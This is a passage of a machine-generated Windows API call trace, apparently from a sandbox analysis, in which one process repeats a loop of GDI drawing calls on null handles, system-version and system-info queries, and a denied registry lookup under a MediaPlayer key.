[0089.488] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.488] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.488] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.488] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.488] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401dc [0089.488] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401d9 [0089.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045660 [0089.488] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045661 [0089.488] CombineRgn (hrgnDst=0x1045660, hrgnSrc1=0x990401dc, hrgnSrc2=0x9b0401d9, iMode=1) returned 1 [0089.488] CombineRgn (hrgnDst=0x1045661, hrgnSrc1=0x990401dc, hrgnSrc2=0x9b0401d9, iMode=4) returned 2 [0089.488] CreateSolidBrush (color=0xff) returned 0x210565f [0089.488] CreateSolidBrush (color=0xff0000) returned 0x1105662 [0089.488] DeleteObject (ho=0x1105662) returned 1 [0089.488] DeleteObject (ho=0x9b0401d9) returned 1 [0089.488] DeleteObject (ho=0x990401dc) returned 1 [0089.488] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.488] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.488] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.488] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.488] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.488] BeginPath (hdc=0x0) returned 0 [0089.488] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.489] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.489] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401d9 [0089.489] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401dc [0089.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045663 [0089.489] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045664 [0089.489] CombineRgn (hrgnDst=0x1045663, hrgnSrc1=0x9c0401d9, hrgnSrc2=0x9a0401dc, iMode=1) returned 1 [0089.489] CombineRgn (hrgnDst=0x1045664, hrgnSrc1=0x9c0401d9, hrgnSrc2=0x9a0401dc, iMode=4) returned 2 [0089.489] CreateSolidBrush (color=0xff) returned 0x2105662 [0089.489] CreateSolidBrush (color=0xff0000) returned 0x1105665 [0089.489] DeleteObject (ho=0x1105665) returned 1 [0089.489] DeleteObject (ho=0x9a0401dc) returned 1 [0089.489] DeleteObject (ho=0x9c0401d9) returned 1 [0089.489] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.489] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.489] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.489] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.489] BeginPath (hdc=0x0) returned 0 [0089.489] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.489] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.489] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.489] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.489] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.489] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.489] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.490] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401dc [0089.490] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401d9 [0089.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045666 [0089.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045667 [0089.490] CombineRgn (hrgnDst=0x1045666, hrgnSrc1=0x9b0401dc, hrgnSrc2=0x9d0401d9, iMode=1) returned 1 [0089.490] CombineRgn (hrgnDst=0x1045667, hrgnSrc1=0x9b0401dc, hrgnSrc2=0x9d0401d9, iMode=4) returned 2 [0089.490] CreateSolidBrush (color=0xff) returned 0x2105665 [0089.490] CreateSolidBrush (color=0xff0000) returned 0x1105668 [0089.490] DeleteObject (ho=0x1105668) returned 1 [0089.490] DeleteObject (ho=0x9d0401d9) returned 1 [0089.490] DeleteObject (ho=0x9b0401dc) returned 1 [0089.490] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.490] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.490] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.490] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.490] BeginPath (hdc=0x0) returned 0 [0089.490] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.490] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.490] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.490] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.490] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.490] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.490] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.490] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401d9 [0089.490] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401dc [0089.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045669 [0089.490] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104566a [0089.490] CombineRgn (hrgnDst=0x1045669, hrgnSrc1=0x9e0401d9, hrgnSrc2=0x9c0401dc, iMode=1) returned 1 [0089.490] CombineRgn (hrgnDst=0x104566a, hrgnSrc1=0x9e0401d9, hrgnSrc2=0x9c0401dc, iMode=4) returned 2 [0089.490] CreateSolidBrush (color=0xff) returned 0x2105668 [0089.490] CreateSolidBrush (color=0xff0000) returned 0x110566b [0089.490] DeleteObject (ho=0x110566b) returned 1 [0089.490] DeleteObject (ho=0x9c0401dc) returned 1 [0089.490] DeleteObject (ho=0x9e0401d9) returned 1 [0089.490] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.490] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.491] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.491] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.491] BeginPath (hdc=0x0) returned 0 [0089.491] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.491] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.491] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.491] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.491] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.491] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401dc [0089.491] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401d9 [0089.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104566c [0089.491] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104566d [0089.491] CombineRgn (hrgnDst=0x104566c, hrgnSrc1=0x9d0401dc, hrgnSrc2=0x9f0401d9, iMode=1) returned 1 [0089.491] CombineRgn (hrgnDst=0x104566d, hrgnSrc1=0x9d0401dc, hrgnSrc2=0x9f0401d9, iMode=4) returned 2 [0089.491] CreateSolidBrush (color=0xff) returned 0x210566b [0089.491] CreateSolidBrush (color=0xff0000) returned 0x110566e [0089.491] DeleteObject (ho=0x110566e) returned 1 [0089.491] DeleteObject (ho=0x9f0401d9) returned 1 [0089.491] DeleteObject (ho=0x9d0401dc) returned 1 [0089.491] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.491] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.491] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.491] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.491] BeginPath (hdc=0x0) returned 0 [0089.491] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.491] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.491] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.491] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.491] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.492] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.492] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401d9 [0089.492] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401dc [0089.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104566f [0089.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045670 [0089.492] CombineRgn (hrgnDst=0x104566f, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=1) returned 1 [0089.492] CombineRgn (hrgnDst=0x1045670, hrgnSrc1=0xa00401d9, hrgnSrc2=0x9e0401dc, iMode=4) returned 2 [0089.492] CreateSolidBrush (color=0xff) returned 0x210566e [0089.492] CreateSolidBrush (color=0xff0000) returned 0x1105671 [0089.492] DeleteObject (ho=0x1105671) returned 1 [0089.492] DeleteObject (ho=0x9e0401dc) returned 1 [0089.492] DeleteObject (ho=0xa00401d9) returned 1 [0089.492] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.492] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.492] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.492] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.492] BeginPath (hdc=0x0) returned 0 [0089.492] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.492] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.492] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.492] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.492] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.492] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.492] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.492] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401dc [0089.492] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401d9 [0089.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045672 [0089.492] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045673 [0089.492] CombineRgn (hrgnDst=0x1045672, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=1) returned 1 [0089.492] CombineRgn (hrgnDst=0x1045673, hrgnSrc1=0x9f0401dc, hrgnSrc2=0xa10401d9, iMode=4) returned 2 [0089.492] CreateSolidBrush (color=0xff) returned 0x2105671 [0089.493] CreateSolidBrush (color=0xff0000) returned 0x1105674 [0089.493] DeleteObject (ho=0x1105674) returned 1 [0089.493] DeleteObject (ho=0xa10401d9) returned 1 [0089.493] DeleteObject (ho=0x9f0401dc) returned 1 [0089.493] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.493] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.493] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.493] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.493] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.493] BeginPath (hdc=0x0) returned 0 [0089.493] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.493] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.493] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.493] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.493] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.493] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.493] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.493] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.493] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401d9 [0089.493] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401dc [0089.493] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045675 [0089.493] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045676 [0089.493] CombineRgn (hrgnDst=0x1045675, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=1) returned 1 [0089.493] CombineRgn (hrgnDst=0x1045676, hrgnSrc1=0xa20401d9, hrgnSrc2=0xa00401dc, iMode=4) returned 2 [0089.493] CreateSolidBrush (color=0xff) returned 0x2105674 [0089.493] CreateSolidBrush (color=0xff0000) returned 0x1105677 [0089.493] DeleteObject (ho=0x1105677) returned 1 [0089.493] DeleteObject (ho=0xa00401dc) returned 1 [0089.493] DeleteObject (ho=0xa20401d9) returned 1 [0089.493] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.493] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.493] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.493] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.493] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.493] BeginPath (hdc=0x0) returned 0 [0089.493] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.493] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.494] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.494] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.494] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.494] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.494] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.494] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401dc [0089.494] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401d9 [0089.494] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045678 [0089.494] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045679 [0089.494] CombineRgn (hrgnDst=0x1045678, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=1) returned 1 [0089.494] CombineRgn (hrgnDst=0x1045679, hrgnSrc1=0xa10401dc, hrgnSrc2=0xa30401d9, iMode=4) returned 2 [0089.494] CreateSolidBrush (color=0xff) returned 0x2105677 [0089.494] CreateSolidBrush (color=0xff0000) returned 0x110567a [0089.494] DeleteObject (ho=0x110567a) returned 1 [0089.494] DeleteObject (ho=0xa30401d9) returned 1 [0089.494] DeleteObject (ho=0xa10401dc) returned 1 [0089.494] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.494] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.494] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.494] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.494] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.494] BeginPath (hdc=0x0) returned 0 [0089.494] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.494] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.495] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.495] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.495] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.495] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.495] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401d9 [0089.495] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401dc [0089.495] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104567b [0089.495] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104567c [0089.495] CombineRgn (hrgnDst=0x104567b, hrgnSrc1=0xa40401d9, hrgnSrc2=0xa20401dc, iMode=1) returned 